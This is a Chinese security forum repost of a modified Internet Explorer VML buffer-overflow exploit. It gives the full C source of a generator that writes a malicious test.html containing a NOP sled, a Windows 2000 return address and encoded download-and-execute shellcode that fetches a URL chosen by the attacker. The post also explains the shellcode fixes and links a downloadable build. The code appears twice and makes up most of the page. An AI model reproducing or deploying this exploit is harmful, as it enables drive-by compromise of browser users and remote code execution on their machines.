IE VML BufferOverflow Download&Exec Exploit 修改版 's

2017年4月17日08:28:16评论321 views字数 4039阅读13分27秒阅读模式

摘要

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：gyzy

所有代码都修改自NOP的模版，在此表示感谢。方便大家的研究写了个生成器，欢迎大家下载测试。NOP在milw0rm.com上公布的代码里有点小问题。填上了自己的shellcode，将第一个字节改成/xCC后发现shellcode的解码部分连续出现的三个/xFF中的后面两个会被破坏，这和以前的Serv-U溢出一样，所以在头部加入几个修正字节：
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试，成功。测试环境Win2000 Professional SP4 + IE5.0

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"

FILE *fp = NULL;
HWND hdlg;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);

/* Search Shellcod
/x80/x44/x24/x1A/xC0
/x80/x44/x24/x1B/xFF
*/

unsigned char sh4llcode[] =
"/x80/x44/x24/x2E/xC0/x80/x44/x24/x2F/xFF/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x3C/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"

"/x70/x4C/x99/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9D/xC0"
"/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F/x8A/xCF/xDF/x19/xA7/x19"
"/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12/x45/xF3/xB9/xCA/x66/xCE"
"/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD/x9A/x9D/xE1/xFC/x99/x99"
"/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65/x12/x45/xC9/xCA/x66/xCE"
"/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA"
"/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/xBF/x66/x66/x66"

"/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDE"
"/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB/xFC/xFA/xED/xF6/xEB"
"/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99/xDC/xE1/xF0/xED/xCD"
"/xF1/xEB/xFC/xF8/xFD/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB"
"/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99/xCC/xCB/xD5/xDD/xF6/xEE"
"/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5/xFC/xD8/x99";

// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";

char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);
}
}

void create(char* url)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

fp = fopen("test.html", "w+b");

if(!fp)
{
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

for(i=0; i<NOPSIZE; i++)
{
fprintf(fp, "A");
}

fflush(fp);

// print shellcode
memset(buf, 0x90, sizeof(buf));

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(sh4llcode)-1;

memcpy(buf+psize, url, strlen(url));//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += strlen(url);

BYTE end = 0x80;
memcpy(buf+psize, &end, 1);
psize += 1;
// print NCR
convert2ncr(buf, psize);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

}

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
return 0;
}

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hdlg = hwndDlg;
return true;

case WM_COMMAND:
if (LOWORD(wParam) == IDOK)
{
char url[256];
ZeroMemory(url,256);
GetDlgItemText(hdlg,IDC_EDIT1,url,256);
create(url);
MessageBox(hwndDlg,"恭喜，test.html已生成！","提示",MB_ICONINFORMATION);
}

if (LOWORD(wParam) == IDCANCEL)
{
EndDialog(hwndDlg, LOWORD(wParam));
PostQuitMessage(0);
}
break;
}
return 0;
}
生成器下载：IEOverflow.rar

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：gyzy
IE VML BufferOverflow Download&Exec Exploit 修改版 's
所有代码都修改自NOP的模版，在此表示感谢。方便大家的研究写了个生成器，欢迎大家下载测试。NOP在milw0rm.com上公布的代码里有点小问题。填上了自己的shellcode，将第一个字节改成/xCC后发现shellcode的解码部分连续出现的三个/xFF中的后面两个会被破坏，这和以前的Serv-U溢出一样，所以在头部加入几个修正字节：
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试，成功。测试环境Win2000 Professional SP4 + IE5.0
#include <stdio.h> #include <stdlib.h> #include <windows.h> #include "resource.h"


FILE *fp = NULL;
HWND hdlg;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);
/* Search Shellcod
/x80/x44/x24/x1A/xC0
/x80/x44/x24/x1B/xFF
*/
unsigned char sh4llcode[] =
"/x80/x44/x24/x2E/xC0/x80/x44/x24/x2F/xFF/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x3C/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
"/x70/x4C/x99/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9D/xC0"
"/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F/x8A/xCF/xDF/x19/xA7/x19"
"/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12/x45/xF3/xB9/xCA/x66/xCE"
"/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD/x9A/x9D/xE1/xFC/x99/x99"
"/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65/x12/x45/xC9/xCA/x66/xCE"
"/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA"
"/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/xBF/x66/x66/x66"
"/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDE"
"/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB/xFC/xFA/xED/xF6/xEB"
"/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99/xDC/xE1/xF0/xED/xCD"
"/xF1/xEB/xFC/xF8/xFD/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB"
"/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99/xCC/xCB/xD5/xDD/xF6/xEE"
"/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5/xFC/xD8/x99";
// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";
char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
 int i=0;
 unsigned int ncr = 0;
 for(i=0; i<size; i+=2)
 {
 ncr = (buf[i+1] << 8) + buf[i];
 fprintf(fp, "&#%d;", ncr);
 }
}
void create(char* url)
{
 unsigned char buf[1024] = {0};
 unsigned char burl[255] = {0};
 int sc_len = 0;
 int psize = 0;
 int i = 0;
 unsigned int nop = 0x4141;
 DWORD jmp = 0xeb06eb06;
 fp = fopen("test.html", "w+b");
 if(!fp)
 {
 return;
 }
 // print html header
 fprintf(fp, "%s", header);
 fflush(fp);
 for(i=0; i<NOPSIZE; i++)
 {
 fprintf(fp, "A");
 }
 fflush(fp);
 // print shellcode
 memset(buf, 0x90, sizeof(buf));
 memcpy(buf, &ret, 4);
 psize = 4+8+0x10;
 memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);//memcpy(buf+psize, dc, sizeof(dc)-1);
 psize += sizeof(sh4llcode)-1;
 memcpy(buf+psize, url, strlen(url));//memcpy(buf+psize, dc, sizeof(dc)-1);
 psize += strlen(url);
 BYTE end = 0x80;
 memcpy(buf+psize, &end, 1);
 psize += 1;
 // print NCR
 convert2ncr(buf, psize);
 // print html footer
 fprintf(fp, "%s", footer);
 fflush(fp);
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{ 
 DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
 return 0;
}
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
 {
 case WM_INITDIALOG:
 hdlg = hwndDlg;
 return true;
 case WM_COMMAND:
 if (LOWORD(wParam) == IDOK)
 {
 char url[256];
 ZeroMemory(url,256);
 GetDlgItemText(hdlg,IDC_EDIT1,url,256);
 create(url);
 MessageBox(hwndDlg,"恭喜，test.html已生成！","提示",MB_ICONINFORMATION);
 }

if (LOWORD(wParam) == IDCANCEL) { EndDialog(hwndDlg, LOWORD(wParam)); PostQuitMessage(0); } break; } return 0; }
生成器下载：IEOverflow.rar

用户可以根据具体OS语言版本需要改相应jmp ESP 的地址。
其实nop公开的那个也是可用的，只不过他犯了个错误，应该是故意的。zhouzhen兄也发现了，呵呵。 "burl[i] = buf[i] ^ 0xee;"这句错了，应该： burl[i] = url[i] ^ 0xee;

左青龙
微信扫一扫

右白虎
微信扫一扫

IE VML BufferOverflow Download&Exec Exploit 修改版 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信